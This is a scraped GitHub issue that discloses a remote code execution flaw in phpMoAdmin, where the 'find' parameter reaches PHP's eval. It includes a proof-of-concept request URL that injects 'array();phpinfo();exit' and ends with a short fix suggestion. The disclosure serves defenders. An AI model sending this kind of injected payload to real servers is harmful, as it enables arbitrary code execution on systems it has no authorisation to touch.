phpMoAdmin-MongoDB-Admin-Tool-for-PHP icon indicating copy to clipboard operation
phpMoAdmin-MongoDB-Admin-Tool-for-PHP copied to clipboard

Published 20 hours ago verified publisher icon MongoDB-Rox

phpMoAdmin Remote Code Execution

Open sevck opened this issue 5 years ago • 0 comments

hi, We found a remote code execution vulnerability in phpmoadmin that could allow an attacker to remotely execute arbitrary code to attack an attack server. image

code line in 562: The find parameter is directly brought into the eval function.

payload: http://www.xxx.com/moadmin.php?db=datagovernance&action=listRows&collection=quality_control_base&find=array();phpinfo();exit

This payload execution phpinfo();

image

fix: In php, the eval function is dangerous. It is not recommended to use it. If you must use it, you need to limit the incoming data.

sevck avatar Apr 29 '19 02:04 sevck